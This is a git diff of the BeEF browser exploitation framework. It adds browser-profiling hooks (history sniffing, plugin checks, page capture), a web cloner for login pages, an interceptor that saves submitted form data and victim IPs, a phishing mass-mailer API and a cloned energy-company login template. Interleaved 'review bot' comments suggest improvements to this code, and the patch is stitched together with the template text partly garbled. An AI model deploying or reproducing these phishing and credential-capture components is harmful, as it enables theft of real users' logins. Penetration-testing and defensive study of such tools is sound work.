Plug-In"]) { + result = true; + } + } catch (e) { + result = false; + } - /** - * Changes page title - **/ - changePageTitle: function(title) { - document.title = title; - }, + return result; + }, - /** - * A function that gets the max number of simultaneous connections the - * browser can make per domain, or globally on all domains. 
- * - * This code is based on research from browserspy.dk - * - * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default} - * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes - * the number of connections to the callback function as "this" - * - * example usage: - * $j.when(getMaxConnections()).done(function(){ - * console.debug("Max Connections: " + this); - * }); - * - */ - getMaxConnections: function(scope) { + /** + * Returns array of results, whether or not the target zombie has visited the specified URL + */ + hasVisited:function (urls) { + var results = new Array(); + var iframe = beef.dom.createInvisibleIframe(); + var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document; + ifdoc.open(); + ifdoc.write(''); + ifdoc.close(); + urls = urls.split("\n"); + var count = 0; + for (var i in urls) { + var u = urls[i]; + if (u != "" || u != null) { + var success = false; + var a = ifdoc.createElement('a'); + a.href = u; + ifdoc.body.appendChild(a); + var width = null; + (a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width"); + if (width == '0px') { + success = true; + } + results.push({'url':u, 'visited':success}); + count++; + } + } + beef.dom.removeElement(iframe); + if (results.length == 0) { + return false; + } + return results; + }, - var imagesCount = 30; // Max number of images to test - var secondsTimeout = 5; // Image load timeout threashold - var testUrl =""; // The image testing service URL + /** + * Checks if the zombie has Web Sockets enabled. + * @return: {Boolean} true or false. + * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket + * */ + hasWebSocket:function () { + return !!window.WebSocket || !!window.MozWebSocket; + }, - // User broserspy.dk max connections service URL. 
- if(scope=='PER_DOMAIN') - testUrl = "http://browserspy.dk/connections.php?img=1&random="; - else - // The token will be replaced by a different number with each request(different domain). - testUrl = "http://.browserspy.dk/connections.php?img=1&random="; + /** + * Checks if the zombie has Google Gears installed. + * @return: {Boolean} true or false. + * + * @from: https://code.google.com/apis/gears/gears_init.js + * */ + hasGoogleGears:function () { + + var ggfactory = null; + + // Chrome + if (window.google && google.gears) return true; + + // Firefox + if (typeof GearsFactory != 'undefined') { + ggfactory = new GearsFactory(); + } else { + // IE + try { + ggfactory = new ActiveXObject('Gears.Factory'); + // IE Mobile on WinCE. + if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) { + ggfactory.privateSetGlobalObject(this); + } + } catch (e) { + // Safari + if ((typeof navigator.mimeTypes != 'undefined') + && navigator.mimeTypes["application/x-googlegears"]) { + ggfactory = document.createElement("object"); + ggfactory.style.display = "none"; + ggfactory.width = 0; + ggfactory.height = 0; + ggfactory.type = "application/x-googlegears"; + document.documentElement.appendChild(ggfactory); + if (ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null; + } + } + } + if (!ggfactory) return false; else return true; + }, + + /** + * Checks if the zombie has Foxit PDF reader plugin. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasFoxit()) { ... 
} + * */ + hasFoxit:function () { + + var foxitplugin = false; + + try { + if (beef.browser.isIE()) { + var foxitControl = new ActiveXObject('FoxitReader.FoxitReaderCtl.1'); + foxitplugin = true; + } else if (navigator.plugins['Foxit Reader Plugin for Mozilla']) { + foxitplugin = true; + } + } catch (e) { + foxitplugin = false; + } + + return foxitplugin; + }, + + /** + * Returns the page head HTML + **/ + getPageHead:function () { + var html_head; + try { + html_head = document.head.innerHTML.toString(); + } catch (e) { + } + return html_head; + }, + + /** + * Returns the page body HTML + **/ + getPageBody:function() { + var html_body; + try { + html_body = document.body.innerHTML.toString(); + } catch (e) { + } + return html_body; + }, + + /** + * Dynamically changes the favicon: works in Firefox, Chrome and Opera + **/ + changeFavicon:function (favicon_url) { + var iframe = null; + if (this.isC()) { + iframe = document.createElement('iframe'); + iframe.src = 'about:blank'; + iframe.style.display = 'none'; + document.body.appendChild(iframe); + } + var link = document.createElement('link'), + oldLink = document.getElementById('dynamic-favicon'); + link.id = 'dynamic-favicon'; + link.rel = 'shortcut icon'; + link.href = favicon_url; + if (oldLink) document.head.removeChild(oldLink); + document.head.appendChild(link); + if (this.isC()) iframe.src += ''; + }, + + /** + * Changes page title + **/ + changePageTitle:function (title) { + document.title = title; + }, + + /** + * A function that gets the max number of simultaneous connections the + * browser can make per domain, or globally on all domains. 
+ * + * This code is based on research from browserspy.dk + * + * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default} + * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes + * the number of connections to the callback function as "this" + * + * example usage: + * $j.when(getMaxConnections()).done(function(){ + * console.debug("Max Connections: " + this); + * }); + * + */ + getMaxConnections:function (scope) { + + var imagesCount = 30; // Max number of images to test + var secondsTimeout = 5; // Image load timeout threashold + var testUrl = ""; // The image testing service URL + + // User broserspy.dk max connections service URL. + if (scope == 'PER_DOMAIN') + testUrl = "http://browserspy.dk/connections.php?img=1&random="; + else + // The token will be replaced by a different number with each request(different domain). + testUrl = "http://.browserspy.dk/connections.php?img=1&random="; - var imagesLoaded = 0; // Number of responding images before timeout. - var imagesRequested = 0; // Number of requested images. - var testImages = new Array(); // Array of all images. - var deferredObject = $j.Deferred(); // A jquery Deferred object. + var imagesLoaded = 0; // Number of responding images before timeout. + var imagesRequested = 0; // Number of requested images. + var testImages = new Array(); // Array of all images. + var deferredObject = $j.Deferred(); // A jquery Deferred object. - for (var i = 1; i <= imagesCount; i++) - { - // Asynchronously request image. - testImages[i] = - $j.ajax({ - type: "get", - dataType: true, - url: (testUrl.replace("",i)) + Math.random(), - data: "", - timeout: (secondsTimeout * 1000), + for (var i = 1; i <= imagesCount; i++) { + // Asynchronously request image. + testImages[i] = + $j.ajax({ + type:"get", + dataType:true, + url:(testUrl.replace("", i)) + Math.random(), + data:"", + timeout:(secondsTimeout * 1000), - // Function on completion of request. 
- complete: function(jqXHR, textStatus){ + // Function on completion of request. + complete:function (jqXHR, textStatus) { - imagesRequested++; + imagesRequested++; - // If the image returns a 200 or a 302, the text Status is "error", else null - if(textStatus == "error") - { - imagesLoaded++; - } + // If the image returns a 200 or a 302, the text Status is "error", else null + if (textStatus == "error") { + imagesLoaded++; + } - // If all images requested - if(imagesRequested >= imagesCount) - { - // resolve the deferred object passing the number of loaded images. - deferredObject.resolveWith(imagesLoaded); - } - } - }); + // If all images requested + if (imagesRequested >= imagesCount) { + // resolve the deferred object passing the number of loaded images. + deferredObject.resolveWith(imagesLoaded); + } + } + }); - } + } - // Return a promise to resolve the deffered object when the images are loaded. - return deferredObject.promise(); + // Return a promise to resolve the deffered object when the images are loaded. + return deferredObject.promise(); + + } - } - }; beef.regCmp('beef.browser'); diff --git a/core/main/client/browser/cookie.js b/core/main/client/browser/cookie.js index d9b7cce98..9223a7f23 100644 --- a/core/main/client/browser/cookie.js +++ b/core/main/client/browser/cookie.js 
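Review bot: The catch block in getDetails (the `try{ var cookies = document.cookie;` section) attributes a thrown read to HttpOnly, but an HttpOnly cookie never makes `document.cookie` throw — it is simply left out of the returned string — so the comment and the stored message `Cookies can't be read. The hooked domain is most probably using HttpOnly.` will mislabel the real cause (a sandboxed frame or a document with no cookie access, for instance); replace the comment with `// document.cookie threw; HttpOnly does not cause this, it only omits those cookies from the string` and reword the message to match. In hasVisited, `if (u != "" || u != null)` is always true because an empty string is not null, so blank lines produced by the split are still tested and pushed into results; `if (u != "" && u != null)` is what was meant, and `count` is incremented but never read. getPageHead and getPageBody swallow every exception in an empty catch and fall through to `return html_head;`/`return html_body;` with `undefined`, so callers cannot tell an empty page from a failed read; at minimum document that `undefined` means the read failed. hasSilverlight and hasFoxit assign `slControl`/`foxitControl` only to discard them, so the `new ActiveXObject(...)` calls can stand as bare statements.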
@@ -1,110 +1,101 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.browser.cookie - * - * Provides fuctions for working with cookies. - * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php - * Original author unknown. - * - */ -beef.browser.cookie = { - - setCookie: function (name, value, expires, path, domain, secure) - { - - var today = new Date(); - today.setTime( today.getTime() ); - - if ( expires ) - { - expires = expires * 1000 * 60 * 60 * 24; - } - var expires_date = new Date( today.getTime() + (expires) ); - - document.cookie = name + "=" +escape( value ) + - ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + - ( ( path ) ? ";path=" + path : "" ) + - ( ( domain ) ? ";domain=" + domain : "" ) + - ( ( secure ) ? 
";secure" : "" ); - }, - - getCookie: function(name) - { - var a_all_cookies = document.cookie.split( ';' ); - var a_temp_cookie = ''; - var cookie_name = ''; - var cookie_value = ''; - var b_cookie_found = false; - - for ( i = 0; i < a_all_cookies.length; i++ ) - { - a_temp_cookie = a_all_cookies[i].split( '=' ); - cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); - if ( cookie_name == name ) - { - b_cookie_found = true; - if ( a_temp_cookie.length > 1 ) - { - cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); - } - return cookie_value; - break; - } - a_temp_cookie = null; - cookie_name = ''; - } - if ( !b_cookie_found ) - { - return null; - } - }, - - deleteCookie: function (name, path, domain) - { - if ( this.getCookie(name) ) document.cookie = name + "=" + - ( ( path ) ? ";path=" + path : "") + - ( ( domain ) ? ";domain=" + domain : "" ) + - ";expires=Thu, 01-Jan-1970 00:00:01 GMT"; - }, - - hasSessionCookies: function (name) - { - var name = name || "cookie"; - if (name == "") name = "cookie"; - this.setCookie( name, 'none', '', '/', '', '' ); - - cookiesEnabled = (this.getCookie(name) == null)? false:true; - this.deleteCookie(name, '/', ''); - return cookiesEnabled; - - }, - - hasPersistentCookies: function (name) - { - var name = name || "cookie"; - if (name == "") name = "cookie"; - this.setCookie( name, 'none', 1, '/', '', '' ); - - cookiesEnabled = (this.getCookie(name) == null)? false:true; - this.deleteCookie(name, '/', ''); - return cookiesEnabled; - - } - -}; - +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.browser.cookie + * + * Provides fuctions for working with cookies. + * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php + * Original author unknown. 
+ * + */ +beef.browser.cookie = { + + setCookie: function (name, value, expires, path, domain, secure) + { + + var today = new Date(); + today.setTime( today.getTime() ); + + if ( expires ) + { + expires = expires * 1000 * 60 * 60 * 24; + } + var expires_date = new Date( today.getTime() + (expires) ); + + document.cookie = name + "=" +escape( value ) + + ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + + ( ( path ) ? ";path=" + path : "" ) + + ( ( domain ) ? ";domain=" + domain : "" ) + + ( ( secure ) ? ";secure" : "" ); + }, + + getCookie: function(name) + { + var a_all_cookies = document.cookie.split( ';' ); + var a_temp_cookie = ''; + var cookie_name = ''; + var cookie_value = ''; + var b_cookie_found = false; + + for ( i = 0; i < a_all_cookies.length; i++ ) + { + a_temp_cookie = a_all_cookies[i].split( '=' ); + cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); + if ( cookie_name == name ) + { + b_cookie_found = true; + if ( a_temp_cookie.length > 1 ) + { + cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); + } + return cookie_value; + break; + } + a_temp_cookie = null; + cookie_name = ''; + } + if ( !b_cookie_found ) + { + return null; + } + }, + + deleteCookie: function (name, path, domain) + { + if ( this.getCookie(name) ) document.cookie = name + "=" + + ( ( path ) ? ";path=" + path : "") + + ( ( domain ) ? ";domain=" + domain : "" ) + + ";expires=Thu, 01-Jan-1970 00:00:01 GMT"; + }, + + hasSessionCookies: function (name) + { + var name = name || "cookie"; + if (name == "") name = "cookie"; + this.setCookie( name, 'none', '', '/', '', '' ); + + cookiesEnabled = (this.getCookie(name) == null)? false:true; + this.deleteCookie(name, '/', ''); + return cookiesEnabled; + + }, + + hasPersistentCookies: function (name) + { + var name = name || "cookie"; + if (name == "") name = "cookie"; + this.setCookie( name, 'none', 1, '/', '', '' ); + + cookiesEnabled = (this.getCookie(name) == null)? 
false:true; + this.deleteCookie(name, '/', ''); + return cookiesEnabled; + + } + +}; + beef.regCmp('beef.browser.cookie'); \ No newline at end of file diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js index bdea5eb35..640386d97 100644 --- a/core/main/client/browser/popup.js +++ b/core/main/client/browser/popup.js 
@@ -1,39 +1,30 @@
-//
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-/*!
- * @literal object: beef.browser.popup
- *
- * Provides fuctions for working with cookies.
- * Several functions adopted from http://davidwalsh.name/popup-block-javascript
- * Original author unknown.
- *
- */
-beef.browser.popup = {
-
- blocker_enbabled: function ()
- {
- screenParams = beef.browser.getScreenSize();
- var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
- if (popUp == null || typeof(popUp)=='undefined') {
- return true;
- } else {
- popUp.close();
- return false;
- }
- }
-};
-
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.popup
+ *
+ * Provides fuctions for working with cookies.
+ * Several functions adopted from http://davidwalsh.name/popup-block-javascript
+ * Original author unknown.
+ *
+ */
+beef.browser.popup = {
+
+ blocker_enabled: function ()
+ {
+ screenParams = beef.browser.getScreenSize();
+ var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
+ if (popUp == null || typeof(popUp)=='undefined') {
+ return true;
+ } else {
+ popUp.close();
+ return false;
+ }
+ }
+};
+
 beef.regCmp('beef.browser.popup');
diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 387b514bf..c184fae17 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.dom
 *
@@ -85,6 +76,30 @@ beef.dom = { return iframe; }, + + /** + * Returns the highest current z-index + * @param: {Boolean} whether to return an associative array with the height AND the ID of the element + * @return: {Integer} Highest z-index in the DOM + * OR + * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING} + */ + getHighestZindex: function(include_id) { + var highest = {'height':0, 'elem':''}; + $j('*').each(function() { + var current_high = parseInt($j(this).css("zIndex"),10); + if (current_high > highest.height) { + highest.height = current_high; + highest.elem = $j(this).attr('id'); + } + }); + + if (include_id) { + return highest; + } else { + return highest.height; + } + }, /** * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted. @@ -104,8 +119,15 @@ beef.dom = { var form_action = params['src']; params['src'] = ''; } - if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); } - if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); } + if (type == 'hidden') { + css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); + } else if (type == 'fullscreen') { + css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles); + $j('body').css({'padding':'0px', 'margin':'0px'}); + } else { + css = styles; + $j('body').css({'padding':'0px', 'margin':'0px'}); + } var iframe = $j(' + + + + + + + + + + + + +
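Review bot: The JSDoc for `getHighestZindex` does not name its parameter and writes `@param:`/`@return:` with trailing colons, which JSDoc parsers do not recognise; suggest `@param {Boolean} include_id - when truthy, return {'height': INT, 'elem': STRING} instead of the bare integer`. `parseInt($j(this).css("zIndex"),10)` yields `NaN` for the default value `auto`, and `NaN > highest.height` is false, so such elements are skipped and a DOM with no explicit z-index returns 0 — a short comment on that line, e.g. `// 'auto' parses to NaN and is ignored by the comparison`, would save the next reader a detour. The `beef.dom.getHighestZindex()+1` call visible in the following hunk runs this `$j('*')` walk on every fullscreen iframe, which is linear in DOM size; acceptable now, but worth stating in the doc block.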
+ + + + + + + + + + + + + + + + + + + MyAccount + + + + + + + + + + + + + + + + +
+
+
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + + +
+
+ + +
    +

    +
    + +
    +
+ +
+
+ +
+
+ + + + + + +
+

+ main content +

+
+ +
+ +
+
+
+

Login to MyAccount

+ + + +
+ + + + + + + + + +
+ + + + + + + + + + + + + + +
+ + + + helpPlease enter your username +
+ + + + helpPlease enter the password for this account +
+ + + + + +


+

Forgotten your username or password?

+
+ + +
+
+

Register Today!

+

 

+ +
    +
  • View and pay your bills
  • +
  • Submit your meter reading
  • +
  • Update your details
  • +
  • Sign up for Direct Debit
  • +

+ + + + + +
+ + +    +
+
+

Don't have an online account?
You can still submit a meter reading

+
+
+
+
+
+
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+ + + + +
+ + +
\ No newline at end of file
diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png
new file mode 100644
index 000000000..2734ec427
Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png differ
diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png
new file mode 100644
index 000000000..51ca21042
Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png differ
diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png
new file mode 100644
index 000000000..a4f175112
Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png differ
diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb
new file mode 100644
index 000000000..a5e4c0cc4
--- /dev/null
+++ b/extensions/social_engineering/models/interceptor.rb
@@ -0,0 +1,25 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Core
+ module Models
+ class Interceptor
+
+ include DataMapper::Resource
+
+ storage_names[:default] = 'extension_seng_interceptor'
+
+ property :id, Serial
+ property :ip, Text, :lazy => false
+ property :post_data, Text, :lazy => false
+
+ belongs_to :webcloner
+
+ end
+
+ end
+ end
+end
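Review bot: `belongs_to :webcloner` here does not match the other side of the association, `has n, :extension_seng_interceptor, 'Interceptor'` in models/web_cloner.rb (the next hunk): DataMapper derives the inverse relationship from the name, so I would expect `has n, :interceptors, 'Interceptor'` on Webcloner (or an explicit `:child_key => [:webcloner_id]` on both sides) before `webcloner.interceptors` and the `:webcloner_id` assignment made by the interceptor resolve cleanly — worth confirming against a running DataMapper, since only the model hunks are visible here. A one-line comment on `post_data` saying it holds the raw request body captured by the interceptor, and on `ip` that it is the `request.ip` reported by Rack, would help the next reader; the `:lazy => false` flags also deserve a why.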
diff --git a/extensions/social_engineering/models/mass_mailer.rb b/extensions/social_engineering/models/mass_mailer.rb
new file mode 100644
index 000000000..f29abe168
--- /dev/null
+++ b/extensions/social_engineering/models/mass_mailer.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Core
+ module Models
+
+ class Massmailer
+
+ include DataMapper::Resource
+
+ storage_names[:default] = 'extension_seng_massmailer'
+
+ property :id, Serial
+
+ #todo fields
+ end
+
+ end
+ end
+end
diff --git a/extensions/social_engineering/models/web_cloner.rb b/extensions/social_engineering/models/web_cloner.rb
new file mode 100644
index 000000000..1cbad0926
--- /dev/null
+++ b/extensions/social_engineering/models/web_cloner.rb
@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Core
+ module Models
+ class Webcloner
+
+ include DataMapper::Resource
+
+ storage_names[:default] = 'extension_seng_webcloner'
+
+ property :id, Serial
+
+ property :uri, Text, :lazy => false
+ property :mount, Text, :lazy => false
+
+ has n, :extension_seng_interceptor, 'Interceptor'
+
+ end
+
+ end
+ end
+end
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
new file mode 100644
index 000000000..d424644f0
--- /dev/null
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -0,0 +1,128 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+ module Extension
+ module SocialEngineering
+ class SEngRest < BeEF::Core::Router::Router
+
+ config = BeEF::Core::Configuration.instance
+
+ before do
+ error 401 unless params[:token] == config.get('beef.api_token')
+ halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+ headers 'Content-Type' => 'application/json; charset=UTF-8',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ #Example: curl -H "Content-Type: application/json; charset=UTF-8"
+ #-d '{"url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=
+ #https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2", "mount":"/url"}'
+ #-X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7
+ post '/clone_page' do
+ request.body.rewind
+ begin
+ body = JSON.parse request.body.read
+ uri = body["url"]
+ mount = body["mount"]
+ use_existing = body["use_existing"]
+
+ if uri != nil && mount != nil
+ if (uri =~ URI::regexp).nil? #invalid URI
+ print_error "Invalid URI"
+ halt 401
+ end
+
+ if !mount[/^\//] # mount needs to start with /
+ print_error "Invalid mount (need to be a relative path, and start with / )"
+ halt 401
+ end
+
+ web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
+ success = web_cloner.clone_page(uri,mount,use_existing)
+ if success
+ result = {
+ "success" => true,
+ "mount" => mount
+ }.to_json
+ else
+ result = {
+ "success" => false
+ }.to_json
+ end
+ end
+
+ rescue Exception => e
+ print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+ error 400 # Bad Request
+ end
+ end
+
+ # Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body'
+ #-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7
+ # Example json_body:
+ #{
+ # "template": "default",
+ # "subject": "Hi from BeEF",
+ # "fromname": "BeEF",
+ # "fromaddr": "beef@beef.com",
+ # "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
+ # "linktext": "http://beefproject.com",
+ # "recipients": [{
+ # "user1@gmail.com": "Michele",
+ # "user2@antisnatchor.com": "Antisnatchor"
+ #}]
+ #}
+ post '/send_mails' do
+ request.body.rewind
+ begin
+ body = JSON.parse request.body.read
+
+ template = body["template"]
+ subject = body["subject"]
+ fromname = body["fromname"]
+ fromaddr = body["fromaddr"]
+ link = body["link"]
+ linktext = body["linktext"]
+
+ if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
+ print_error "All parameters are mandatory."
+ halt 401
+ end
+
+ if (link =~ URI::regexp).nil?#invalid URI
+ print_error "Invalid link or linktext"
+ halt 401
+ end
+
+ recipients = body["recipients"][0]
+
+ recipients.each do |email,name|
+ if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil?
+ print_error "Email [#{email}] or name [#{name}] are not valid/null."
+ halt 401
+ end
+ end
+ rescue Exception => e
+ print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
+ error 400
+ end
+
+ begin
+ mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+ mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
+ rescue Exception => e
+ print_error "Invalid mailer configuration"
+ error 400
+ end
+ end
+
+ end
+ end
+ end
+end
\ No newline at end of file
diff --git a/extensions/social_engineering/web_cloner/cloned_pages/readme.txt b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt
new file mode 100644
index 000000000..ba99c53af
--- /dev/null
+++ b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt
@@ -0,0 +1,12 @@
+This is the directory where the cloned pages will be placed.
+If you clone beefproject.com, there will be 2 files:
+ - beefproject.com <- original, unmodified
+ - beefproject.com_mod <- modified one
+
+In case you want to further modify the beefproject.com_mod manually,
+and serve it through BeEF, do the following:
+ - clone the page
+ - modify the beefproject.com_mod file
+ - clone the same page again, adding the "use_existing":"true" parameter in the RESTful API call.
+
+In this way the x_mod page will be served, with your custom modifications.
\ No newline at end of file
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
new file mode 100644
index 000000000..eca90da93
--- /dev/null
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
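Review bot: The `before` filter authenticates with `params[:token] == config.get('beef.api_token')`, a plain string comparison that returns on the first mismatching byte; for a bearer secret a constant-time comparison is the usual choice, e.g. `halt 401 unless Rack::Utils.secure_compare(params[:token].to_s, config.get('beef.api_token').to_s)`. Both handlers wrap their validation in `rescue Exception => e`, so a `NoMethodError` from `body["recipients"][0]` when `recipients` is absent, or from `mount[/^\//]` when `mount` is not a String, is reported as "Invalid JSON input"; rescuing `JSON::ParserError` around the parse only and checking the shape explicitly gives the caller an accurate 400. In `/clone_page`, when `uri` or `mount` is nil the handler leaves the `if` without setting `result`, so the response body is empty rather than an error — an explicit `halt 400` for missing parameters closes that gap, and 400 rather than 401 fits the other validation failures too, since they are not authentication errors. The `halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)` check runs after the token check, so a non-permitted source still learns whether its token was valid; swapping the two lines avoids that.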
@@ -0,0 +1,51 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Extension
+ module SocialEngineering
+ require 'sinatra/base'
+ class Interceptor < Sinatra::Base
+
+ configure do
+ set :show_exceptions, false
+ end
+
+ # intercept GET
+ get "/" do
+ print_info "GET request from IP #{request.ip}"
+ print_info "Referer: #{request.referer}"
+ cloned_page = settings.cloned_page
+ cloned_page
+ end
+
+ # intercept POST
+ post "/" do
+ print_info "POST request from IP #{request.ip}"
+ request.body.rewind
+ data = request.body.read
+ print_info "Intercepted data:"
+ print_info data
+
+ interceptor_db = BeEF::Core::Models::Interceptor.new(
+ :webcloner_id => settings.db_entry.id,
+ :post_data => data,
+ :ip => request.ip
+ )
+ interceptor_db.save
+
+ if settings.frameable
+ print_info "Page can be framed :-) Loading original URL into iFrame..."
+ "\n"
+ else
+ print_info "Page can not be framed :-) Redirecting to original URL..."
+ redirect settings.redirect_to
+ end
+ end
+ end
+ end
+ end
+end
+
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
new file mode 100644
index 000000000..9b98e3537
--- /dev/null
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
